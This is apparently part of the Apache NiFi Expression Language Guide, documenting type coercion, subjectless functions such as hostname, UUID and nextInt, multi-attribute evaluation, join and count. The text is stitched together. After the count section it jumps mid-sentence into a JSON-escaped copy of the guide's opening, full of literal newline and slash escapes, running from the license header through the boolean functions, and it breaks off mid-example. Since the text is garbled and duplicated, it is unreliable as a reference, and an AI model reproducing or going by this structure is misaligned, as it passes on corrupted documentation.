*Subject Type*: [.subject]#String, Decimal, or Date#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: The Expression `${fileSize:toNumber()}` converts the attribute value of "fileSize" to a number.


[.function]
=== toDecimal

*Description*: [.description]#Coerces the Subject into a Decimal#

*Subject Type*: [.subject]#String, Whole Number or Date#

*Arguments*: No arguments

*Return Type*: [.returnType]#Decimal#

*Examples*: The Expression `${fileSize:toDecimal()}` converts the attribute value of "fileSize" to a decimal.




[[subjectless]]
== Subjectless Functions

While the majority of functions in the Expression Language are called by using the syntax
`${attributeName:function()}`, there exist a few functions that are not expected to have subjects.
In this case, the attribute name is not present. For example, the IP address of the machine can
be obtained by using the Expression `${ip()}`. All of the functions in this section are to be called
without a subject. Attempting to call a subjectless function and provide it a subject will result in
an error when validating the function.
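A subjectless function can still serve as the start of a chain, with the functions described earlier applied
to its result. As a small sketch (the output depends on the machine the expression runs on):

-----------------------------------------------
${ip():prepend('Host address: ')}
-----------------------------------------------

This evaluates `ip()` first and then prepends the literal label to the resulting String.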
[.function]
=== hostname

*Description*: [.description]#Returns the Hostname of the machine. An optional argument of type Boolean can be provided
	to specify whether or not the Fully Qualified Domain Name should be used. If `false`, or not specified,
	the hostname will not be fully qualified. If the argument is `true` but the fully qualified hostname
	cannot be resolved, the simple hostname will be returned.#

*Subject Type*: [.subjectless]#No subject#

*Arguments*:

	- [.argName]#_Fully Qualified_# : [.argDesc]#Optional parameter that specifies whether or not the hostname should be
		fully qualified. If not specified, defaults to false.#

*Return Type*: [.returnType]#String#

*Examples*: The fully qualified hostname of the machine can be obtained by using the Expression `${hostname(true)}`,
	while the simple hostname can be obtained by using either `${hostname(false)}` or simply `${hostname()}`.




[.function]
=== UUID

*Description*: [.description]#Returns a randomly generated UUID.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: `${UUID()}` returns a value similar to `de305d54-75b4-431b-adb2-eb6b9e546013`.




[.function]
=== nextInt

*Description*: [.description]#Returns a one-up value (starting at 0) and increasing over the lifetime of the running instance of NiFi.
	This value is not persisted across restarts and is not guaranteed to be unique across a cluster.
	This value is considered "one-up" in that if called multiple times across the NiFi instance, the values will be sequential.
	However, this counter is shared across all NiFi components, so calling this function multiple times from one Processor will
	not guarantee sequential values within the context of a particular Processor.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: If the previous value returned by `nextInt` was `5`, the Expression `${nextInt():divide(2)}` obtains the next available
	integer (6) and divides the result by 2, returning a value of `3`.



[.function]
=== literal

*Description*: [.description]#Returns its argument as a literal String value. This is useful in order to treat a string or a number
	at the beginning of an Expression as an actual value, rather than treating it as an attribute name. Additionally, it
	can be used when the argument is an embedded Expression that we would then like to evaluate additional functions against.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to be treated as a literal string, number, or boolean value.#

*Return Type*: [.returnType]#String#

*Examples*: `${literal(2):gt(1)}` returns `true`

`${literal( ${allMatchingAttributes('a.*'):count()} ):gt(3)}` returns `true` if there are more than 3 attributes whose
names begin with the letter `a`.
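A common use of `literal` is to place a constant on the left-hand side of a comparison, where a bare number or
string would otherwise be parsed as an attribute name. For example, this sketch reverses the usual direction of
a size check:

----
${literal(10):gt( ${fileSize} )}
----

This returns `true` only when 10 is greater than the value of the "fileSize" attribute. Writing the constant
directly, as in `${10:gt(...)}`, would not work, because a leading digit marks the token as an attribute name
that must be quoted.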
[.function]
=== getStateValue

*Description*: [.description]#Accesses a processor's state values by passing in the String key and getting the value back as a String. This
 is a special Expression Language function that only works with processors that explicitly allow EL to query state. Currently only UpdateAttribute
 does.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Key_# : [.argDesc]#The key to use when accessing the state map.#

*Return Type*: [.returnType]#String#

*Examples*: If the UpdateAttribute processor has stored the key "count" with the value "20" in state, then
	`${getStateValue("count")}` returns `20`.



[.function]
=== thread

*Description*: [.description]#Returns the name of the thread used by the processor when evaluating the Expression. This can be useful
 when using a processor with multiple concurrent tasks and where some data uniqueness is required.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: `${thread()}` could return something like `Timer-Driven Process Thread-4`.



[[multi]]
== Evaluating Multiple Attributes

When it becomes necessary to evaluate the same conditions against multiple attributes, this can be accomplished by means of the
`and` and `or` functions. However, this quickly becomes tedious, error-prone, and difficult to maintain. For this reason, NiFi
provides several functions for evaluating the same conditions against groups of attributes at the same time.




[.function]
=== anyAttribute

*Description*: [.description]#Checks to see if any of the given attributes match the given condition. This function has no subject and takes one or more
	arguments that are the names of attributes to which the remainder of the Expression is to be applied. If any of the attributes specified,
	when evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function
	will return `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt", consider the following examples:

.anyAttribute Examples
|=======================================================================
| Expression | Value
| `${anyAttribute("abc", "xyz"):contains("bye")}` | `true`
| `${anyAttribute("filename","xyz"):toUpper():contains("e")}` | `false`
|=======================================================================
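Because the condition is applied to each named attribute in turn, a single `anyAttribute` call can replace a
chain of `or` functions. As an illustrative sketch using the same attribute values as the table above:

----
${anyAttribute("abc", "xyz", "filename"):contains(".txt")}
----

This evaluates to `true` because at least one of the named attributes, "filename", contains the String ".txt".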
[.function]
=== allAttributes

*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more
	arguments that are the names of attributes to which the remainder of the Expression is to be applied. If all of the attributes specified,
	when evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. Otherwise, this function
	will return `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt", consider the following examples:

.allAttributes Examples
|=============================================================================
| Expression | Value
| `${allAttributes("abc", "xyz"):contains("world")}` | `true`
| `${allAttributes("abc", "filename","xyz"):toUpper():contains("e")}` | `false`
|=============================================================================




[.function]
=== anyMatchingAttribute

*Description*: [.description]#Checks to see if any of the given attributes match the given condition. This function has no subject and takes one or more
	arguments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied
	Regular Expressions will be evaluated against the rest of the Expression. If any of the attributes specified,
	when evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function
	will return `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt", consider the following examples:

.anyMatchingAttribute Examples
|==============================================================
| Expression | Value
| `${anyMatchingAttribute("[ax].*"):contains('bye')}` | `true`
| `${anyMatchingAttribute(".*"):isNull()}` | `false`
|==============================================================
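`anyMatchingAttribute` is handy when only the naming convention of the attributes is known in advance. Continuing
with the same attribute values, the following sketch asks whether any attribute whose name begins with `f` holds
the value `file.txt`:

----
${anyMatchingAttribute("f.*"):equals("file.txt")}
----

This evaluates to `true`, since the Regular Expression `f.*` matches the attribute name "filename" and that
attribute's value equals "file.txt".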
[.function]
=== allMatchingAttributes

*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more
	arguments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied
	Regular Expressions will be evaluated against the rest of the Expression. If all of the attributes specified,
	when evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. Otherwise, this function
	will return `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt", consider the following examples:

.allMatchingAttributes Examples
|==============================================================
| Expression | Value
| `${allMatchingAttributes("[ax].*"):contains("world")}` | `true`
| `${allMatchingAttributes(".*"):isNull()}` | `false`
| `${allMatchingAttributes("f.*"):count()}` | `1`
|==============================================================




[.function]
=== anyDelineatedValue

*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against
	the rest of the Expression. If the Expression, when evaluated against any of the individual values, returns `true`, this
	function returns `true`. Otherwise, the function returns `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression,
		though it does not have to be.#
	- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "number_list" attribute contains the value "1,2,3,4,5", and the "word_list" attribute contains the value "the,and,or,not",
	consider the following examples:

.anyDelineatedValue Examples
|===============================================================================
| Expression | Value
| `${anyDelineatedValue("${number_list}", ","):contains("5")}` | `true`
| `${anyDelineatedValue("this that and", ","):equals("${word_list}")}` | `false`
|===============================================================================
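Since the _Delineated Value_ argument is generally an embedded Expression, `anyDelineatedValue` works well for
testing membership in a list-valued attribute. As a sketch against the same "number_list" attribute:

----
${anyDelineatedValue("${number_list}", ","):equals("3")}
----

This evaluates to `true` because one of the five delineated values is exactly "3".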
[.function]
=== allDelineatedValues

*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against
	the rest of the Expression. If the Expression, when evaluated against all of the individual values, returns `true` in each
	case, then this function returns `true`. Otherwise, the function returns `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally
		an embedded Expression, though it does not have to be.#
	- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "number_list" attribute contains the value "1,2,3,4,5", and the "word_list" attribute contains the value "those,known,or,not",
	consider the following examples:

.allDelineatedValues Examples
|===============================================================================
| Expression | Value
| `${allDelineatedValues("${word_list}", ","):contains("o")}` | `true`
| `${allDelineatedValues("${number_list}", ","):count()}` | `5`
| `${allDelineatedValues("${number_list}", ","):matches("[0-9]+")}` | `true`
| `${allDelineatedValues("${word_list}", ","):matches('e')}` | `false`
|===============================================================================




[.function]
=== join

*Description*: [.description]#Aggregate function that concatenates multiple values with the specified delimiter. This function
	may be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`
	functions.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Delimiter_# : [.argDesc]#The String delimiter to use when joining values#

*Return Type*: [.returnType]#String#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt", consider the following examples:

.join Examples
|=======================================================================================
| Expression | Value
| `${allMatchingAttributes("[ax].*"):substringBefore(" "):join("-")}` | `hello-good`
| `${allAttributes("abc", "xyz"):join(" now")}` | `hello world nowgood bye world now`
|=======================================================================================




[.function]
=== count

*Description*: [.description]#Aggregate function that counts the number of non-null, non-false values returned by the
	`allAttributes`, `allMatchingAttributes`, and `allDelineatedValues` functions. This function
	may be used only in conjunction with those functions.#

*Subject Type*: [.subject]#Any#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "number_list" contains "1,2,3,4,5", consider the following examples:

.count Examples
|===========================================================================
| Expression | Value
| `${allMatchingAttributes("[ax].*"):substringBefore(" "):count()}` | `2`
| `${allAttributes("abc", "xyz"):contains("world"):count()}` | `2`
| `${allDelineatedValues(${number_list}, ","):count()}` | `5`
| `${allAttributes("abc", "non-existent-attr", "xyz"):count()}` | `2`
| `${allMatchingAttributes(".*"):length():gt(10):count()}` | `2`
|===========================================================================
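The aggregate functions also compose with the delineated-value functions. As an illustrative sketch, the same
"number_list" attribute can be split on commas and re-joined with a different delimiter:

----
${allDelineatedValues("${number_list}", ","):join(";")}
----

Since each delineated value passes through unchanged before being joined, this would evaluate to `1;2;3;4;5`.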
See the NOTICE file distributed with\n\/\/ this work for additional information regarding copyright ownership.\n\/\/ The ASF licenses this file to You under the Apache License, Version 2.0\n\/\/ (the \"License\"); you may not use this file except in compliance with\n\/\/ the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n= Apache NiFi Expression Language Guide\nApache NiFi Team <dev@nifi.apache.org>\n:homepage: http:\/\/nifi.apache.org\n:linkattrs:\n\n[[overview]]\n== Overview\nAll data in Apache NiFi is represented by an abstraction called a FlowFile.\nA FlowFile is comprised of two major pieces: content and attributes.\nThe content portion of the FlowFile represents the data on which to operate.\nFor instance, if a file is picked up from a local file system using the\nGetFile Processor, the contents of the file will become the contents of the\nFlowFile.\n\nThe attributes portion of the FlowFile represents information about the data\nitself, or metadata. Attributes are key-value pairs that represent what is\nknown about the data as well as information that is useful for routing and\nprocessing the data appropriately.\nKeeping with the example of a file that is picked up from\na local file system, the FlowFile would have an attribute called `filename` that\nreflected the name of the file on the file system. Additionally, the FlowFile will\nhave a `path` attribute that reflects the directory on the file system that this\nfile lived in. The FlowFile will also have an attribute named `uuid`, which is a\nunique identifier for this FlowFile. For complete listing of the core attributes\ncheck out the FlowFile section of the link:developer-guide.html#flowfile[Developer's Guide].\n\nHowever, placing these attributes on a FlowFile do not provide much benefit\nif the user is unable to make use of them. The NiFi Expression Language provides\nthe ability to reference these attributes, compare them to other values,\nand manipulate their values.\n\n\n[[structure]]\n== Structure of a NiFi Expression\n\nThe NiFi Expression Language always begins with the start delimiter `${` and ends\nwith the end delimiter `}`. Between the start and end delimiters is the text of the\nExpression itself. In its most basic form, the Expression can consist of just an\nattribute name. For example, `${filename}` will return the value of the `filename`\nattribute.\n\nIn a slightly more complex example, we can instead return a manipulation of this value.\nWe can, for example, return an all upper-case version of the filename by calling the\n`toUpper` function: `${filename:toUpper()}`. In this case, we reference the `filename`\nattribute and then manipulate this value by using the `toUpper` function. A function call\nconsists of 5 elements. First, there is a function call delimiter `:`. Second is the name\nof the function - in this case, `toUpper`. Next is an open parenthesis (`(`), followed\nby the function arguments. The arguments necessary are dependent upon which function\nis being called. In this example, we are using the `toUpper` function, which does not\nhave any arguments, so this element is omitted. 
Finally, the closing parenthesis (`)`)\nindicates the end of the function call. There are many different functions that are supported\nby the Expression Language to achieve many different goals. Some functions provide String (text)\nmanipulation, such as the `toUpper` function. Others, such as the `equals` and `matches` functions,\nprovide comparison functionality. Functions also exist for manipulating dates and times and\nfor performing mathematical operations. Each of these functions is described below, in the\n<<functions>> section, with an explanation of what the function does, the arguments that it\nrequires, and the type of information that it returns.\n\nWhen we perform a function call on an attribute, as above, we refer to the attribute as the\n_subject_ of the function, as the attribute is the entity on which the function is operating.\nWe can then chain together multiple function calls, where the return value of the first function\nbecomes the subject of the second function and its return value becomes the subject of the third\nfunction and so on. Continuing with our example, we can chain together multiple functions by using\nthe expression `${filename:toUpper():equals('HELLO.TXT')}`. There is no limit to the number of\nfunctions that can be chained together.\n\nAny FlowFile attribute can be referenced using the Expression Language. However, if the attribute\nname contains a \"special character\", the attribute name must be escaped by quoting it. The following\ncharacters are each considered \"special characters\":\n\n- $ (dollar sign)\n- | (pipe)\n- { (open brace)\n- } (close brace)\n- ( (open parenthesis)\n- ) (close parenthesis)\n- [ (open bracket)\n- ] (close bracket)\n- , (comma)\n- : (colon)\n- ; (semicolon)\n- \/ (forward slash)\n- * (asterisk)\n- ' (single quote)\n- (space)\n- \\t (tab)\n- \\r (carriage return)\n- \\n (new-line)\n\nAdditionally, a number is considered a \"special character\" if it is the first character of the attribute name.\nIf any of these special characters is present in an attribute is quoted by using either single or double quotes.\nThe Expression Language allows single quotes and double quotes to be used interchangeably. For example, the following\ncan be used to escape an attribute named `my attribute`: `${\"my attribute\"}` or `${'my attribute'}`.\n\nIn this example, the value to be returned is the value of the \"my attribute\" value, if it exists. If that attribute\ndoes not exist, the Expression Language will then look for a System Environment Variable named \"my attribute.\" If\nunable to find this, it will look for a JVM System Property named \"my attribute.\" Finally, if none of these exists,\nthe Expression Language will return a `null` value.\n\nThere also exist some functions that expect to have no subject. These functions are invoked simply\nby calling the function at the beginning of the Expression, such as `${hostname()}`. These functions\ncan then be changed together, as well. For example, `${hostname():toUpper()}`. Attempting to\nevaluate the function with subject will result in an error. In the <<functions>>\nsection below, these functions will clearly indicate in their descriptions that they do not\nrequire a subject.\n\nOften times, we will need to compare the values of two different attributes to each other.\nWe are able to accomplish this by using embedded Expressions. 
We can, for example, check if\nthe `filename` attribute is the same as the `uuid` attribute: `${filename:equals( ${uuid} )}`.\nNotice here, also, that we have a space between the opening parenthesis for the `equals` method and\nthe embedded Expression. This is not necessary and does not affect how the Expression is evaluated\nin any way. Rather, it is intended to make the Expression easier to read. White space is ignored by\nthe Expression Language between delimiters. Therefore, we can use the Expression\n`${ filename : equals(${ uuid}) }` or `${filename:equals(${uuid})}` and both Expressions\nmean the same thing. We cannot, however, use `${file name:equals(${uuid})}`, because this results\nin `file` and `name` being interpreted as different tokens, rather than a single token, `filename`.\n\n\n\n[[usage]]\n== Expression Language in the Application\n\nThe Expression Language is used heavily throughout the NiFi application for configuring Processor\nproperties. Not all Processor properties support the Expression Language, however. Whether or not\na Property supports the Expression Language is determined by the developer of the Processor when\nthe Processor is written. However, the application strives to clearly illustrate for each Property\nwhether or not the Expression Language is supported.\n\nIn the application, when configuring a component property, the User Interface provides an Information\nicon (\nimage:iconInfo.png[\"Info\"]\n) next to the name of the Property. Hovering over this icon with the mouse will provide a tooltip that\nprovides helpful information about the Property. This information includes a description of the Property,\nthe default value (if any), historically configured values (if any), and the evaluation scope of this\nproperty for expression language. There are three values and the evaluation scope of the expression\nlanguage is hierarchical: NONE -> VARIABLE_REGISTRY -> FLOWFILE_ATTRIBUTES.\n\n* NONE - expression language is not supported for this property\n* VARIABLE_REGISTRY is hierarchically constructed as below:\n** Variables defined at process group level and then, recursively, up to the higher process group until\nthe root process group.\n** Variables defined in custom properties files through the nifi.variable.registry.properties property\nin nifi.properties file.\n** Environment variables defined at JVM level and system properties.\n* FLOWFILE_ATTRIBUTES - will use attributes of each individual flow file, as well as those variables defined\nby the Variable Registry, as described above.\n\n[[escaping]]\n=== Escaping Expression Language\n:extra-dollar-sign: Hello $${UserName}\n:literal-value: Hello $$User$$Name\n:four-dollar-signs: $$$${abc}\n:five-dollar-signs: $$$$${abc}\n\nThere may be times when a property supports Expression Language, but the user wishes to use a literal value\nthat follows the same syntax as the Expression Language. For example, a user may want to configure a property\nvalue to be the literal text `Hello ${UserName}`. In such a case, this can be accomplished by using an extra\n`$` (dollar sign symbol) just before the expression to escape it (i.e., `{extra-dollar-sign}`). Unless the `$`\ncharacter is being used to escape an Expression, it should not be escaped. 
For example, the value `{literal-value}`\nshould not escape the `$` characters, so the literal value that will be used is `{literal-value}`.\n\nIf more than two `$` characters are encountered sequentially before a `{`, then each pair of `$` characters will\nbe considered an escaping of the `$` character. The escaping will be performed from left-to-right.\nTo help illustrate this, consider that the variable `abc` contains the value `xyz`. Then, consider the following\ntable of Expressions and their corresponding evaluated values:\n\n.Escaping EL Examples\n|========================================================================================\n| Expression | Value | Notes\n| `${abc}` | `xyz` |\n| `$${abc}` | `${abc}` |\n| `$$${abc}` | `$xyz` |\n| `{four-dollar-signs}` | `$${abc}` |\n| `{five-dollar-signs}` | `$$xyz` |\n| `I owe you $5` | `I owe you $5` | No actual Expression is present here.\n| `You owe me $$5 too` | `You owe me $$5 too` | The $ character is not escaped because it does not immediately precede an Expression.\n| `Unescaped $$${5 because no closing brace` | `Unescaped $$${5 because no closing brace` | Because there is no closing brace here, there is no actual Expression and hence the $ characters are not\nescaped.\n| `Unescaped $$${5} because no closing brace` | <Error> | This expression is not valid because it equates to an escaped $, followed by `${5}` and the `${5}` is not a valid Expression. The number\nmust be escaped.\n| `Unescaped $$${'5'} because no closing brace` | `Unescaped $ because no closing brace` | There is no attribute named `5` so the Expression evaluates to an empty string. The `$$` evaluates to a\nsingle (escaped) `$` because it immediately precedes an Expression.\n|========================================================================================\n\n[[editor]]\n=== Expression Language Editor\n\nWhen configuring the value of a Processor property, the NiFi User Interface provides help with the\nExpression Language using the Expression Language editor. Once an Expression is begin by typing `${`,\nthe editor begins to highlight parentheses and braces so that the user is easily able to tell which\nopening parenthesis or brace matches which closing parenthesis or brace.\n\nThe editor also supplies context-sensitive help by providing a list of all functions that can be used\nat the current cursor position. To activate this feature, press Ctrl+Space on the keyboard. The user\nis also able to type part of a function name and then press Ctrl+Space to see all functions that can\nbe used that start with the same prefix. For example, if we type into the editor `${filename:to`\nand then press Ctrl+Space, we are provided a pop-up that lists six different functions: `toDate`,\n`toLower`, `toNumber`, `toRadix`, `toString`, and `toUpper`. We can then continue typing to narrow\nwhich functions are shown, or we can select one of the functions from the list by double-clicking\nit with the mouse or using the arrow keys to highlight the desired function and pressing Enter.\n\n\n\n[[functions]]\n== Functions\n\nFunctions provide a convenient way to manipulate and compare values of attributes. The Expression Language\nprovides many different functions to meet the needs of a automated dataflow. Each function takes\nzero or more arguments and returns a single value. These functions can then be chained together to create\npowerful Expressions to evaluate conditions and manipulate values. 
See <<structure>> for more information\non how to call and chain functions together.\n\n[[types]]\n=== Data Types\n\nEach argument to a function and each value returned from a function has a specific data type. The Expression\nLanguage supports four different data types:\n\n- *String*: A String is a sequence of characters that can consist of numbers, letters, white space, and\n\tspecial characters.\n- *Number*: A Number is an whole number comprised of one or more digits (`0` through `9`). When converting to numbers from Date data types, they are represented as\n\tthe number of milliseconds since midnight GMT on January 1, 1970.\n- *Decimal*: A Decimal is a numeric value that can support decimals and larger values with minimal loss of precision. More precisely it\n is a double-precision 64-bit IEEE 754 floating point. Due to this minimal loss of precision this data type should not be used for\n very precise values, such as currency. For more documentation on the range of values stored in this data type\n refer to this link:https:\/\/docs.oracle.com\/javase\/specs\/jls\/se7\/html\/jls-4.html#jls-4.2.3[link^]. The following are some examples of the forms of\n literal decimals that are supported in expression language (the \"E\" can also be lower-case):\n\n * 1.1\n * .1E1\n * 1.11E-12\n\n- *Date*: A Date is an object that holds a Date and Time. Utilizing the <<dates>> and <<type_cast>> functions this data\n\ttype can be converted to\/from Strings and numbers. If the whole Expression Language expression is evaluated to be a\n\tdate then it will be converted to a String with the format: \"<Day of Week> <Month> <Day of Month> <Hour>:<Minute>:<Second> <Time Zone> <Year>\".\n\tAlso expressed as \"E MMM dd HH:mm:ss z yyyy\" in Java SimpleDateFormat format. For example: \"Wed Dec 31 12:00:04 UTC 2016\".\n- *Boolean*: A Boolean is one of either `true` or `false`.\n\nAfter evaluating expression language functions, all attributes are stored as type String.\n\nThe Expression Language is generally able to automatically coerce a value of one data type to the appropriate\ndata type for a function. However, functions do exist to manually coerce a value into a specific data type.\nSee the <<type_cast>> section for more information.\n\nHex values are supported for Number and Decimal types but they must be quoted and prepended with \"0x\" when being\ninterpreted as literals. For example these two expressions are valid (without the quotes or \"0x\" the expression would fail to run properly):\n\n - ${literal(\"0xF\"):toNumber()}\n - ${literal(\"0xF.Fp10\"):toDecimal()}\n\n\n\n\n[[boolean]]\n== Boolean Logic\n\nOne of the most powerful features of the Expression Language is the ability to compare an attribute value against\nsome other value. This is used often, for example, to configure how a Processor should route data. The following\nfunctions are used for performing boolean logic, such as comparing two values.\nEach of these functions are designed to work on values of type Boolean.\n\n\n[.function]\n=== isNull\n*Description*: [.description]#The `isNull` function returns `true` if the subject is null, `false` otherwise. 
This is typically used to determine\nif an attribute exists.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\t`${filename:isNull()}` returns `true` if the \"filename\" attribute does not exist.\n\tIt returns `false` if the attribute exists.\n\n\n\n[.function]\n=== notNull\n*Description*: [.description]#The `notNull` function returns the opposite value of the `isNull` function. That is, it will return `true` if the\nsubject exists and `false` otherwise.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:notNull()}` returns `true` if the \"filename\" attribute exists. It returns `false` if the attribute\n\tdoes not exist.\n\n\n\n[.function]\n=== isEmpty\n*Description*: [.description]#The `isEmpty` function returns `true` if the Subject is null, does not contain any characters\n\tor contains only white-space (new line, carriage return, space, tab), `false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:isEmpty()}` returns `true` if the \"filename\" attribute does not exist or contains only\n\twhite space. `${literal(\" \"):isEmpty()}` returns true as well as `${literal(\"\"):isEmpty()}`.\n\n\n\n\n[.function]\n=== equals\n\n[.description]\n*Description*: [.description]#The `equals` function is very widely used and determines if its subject is equal to another String value.\n\tNote that the `equals` function performs a direct comparison of two String values. Take care not to confuse this\n\tfunction with the <<matches>> function, which evaluates its subject against a Regular Expression.#\n\n[.subject]\n*Subject Type*: [.subject]#Any#\n\n[.arguments]\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to. Must be same type as the Subject.#\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*:\nWe can check if the filename of a FlowFile is \"hello.txt\" by using the expression `${filename:equals('hello.txt')}`,\nor we could check if the value of the attribute `hello` is equal to the value of the `filename` attribute:\n`${hello:equals( ${filename} )}`.\n\n\n\n[.function]\n=== equalsIgnoreCase\n*Description*: [.description]#Similar to the `equals` function, the `equalsIgnoreCase` function compares its subject against a String value but returns\n`true` if the two values differ only by case (upper case vs. lower case).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:equalsIgnoreCase('hello.txt')}` will evaluate to `true` if filename is equal to \"hello.txt\"\n\tor \"HELLO.TXT\" or \"HeLLo.TxT\".\n\n\n\n\n[.function]\n=== gt\n*Description*: [.description]#The `gt` function is used for numeric comparison and returns `true` if the subject is Greater Than\n\tits argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:gt( 1024 )}` will return `true` if the size of the FlowFile's content is more than 1 kilobyte\n\t(1024 bytes). 
Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== ge\n*Description*: [.description]#The `ge` function is used for numeric comparison and returns `true` if the subject is Greater Than\n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:ge( 1024 )}` will return `true` if the size of the FlowFile's content is at least (\n\tis greater than or equal to) 1 kilobyte (1024 bytes). Otherwise, it will return `false`.\n\n\n\n[.function]\n=== lt\n*Description*: [.description]#The `lt` function is used for numeric comparison and returns `true` if the subject is Less Than\n\tits argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:lt( 1048576 )}` will return `true` if the size of the FlowFile's content is less than\n\t1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== le\n*Description*: [.description]#The `le` function is used for numeric comparison and returns `true` if the subject is Less Than\n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number,\n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:le( 1048576 )}` will return `true` if the size of the FlowFile's content is at most\n\t(less than or equal to) 1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n\n\n[.function]\n=== and\n*Description*: [.description]#The `and` function takes as a single argument a Boolean value and returns `true` if both the Subject\n\tand the argument are `true`. If either the subject or the argument is `false` or cannot be coerced into a Boolean,\n\tthe function returns `false`. Typically, this is used with an embedded Expression as the argument.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: We can check if the filename is both all lower-case and has at least 5 characters by using the Expression\n-----------------------------------------------\n${filename:toLower():equals( ${filename} 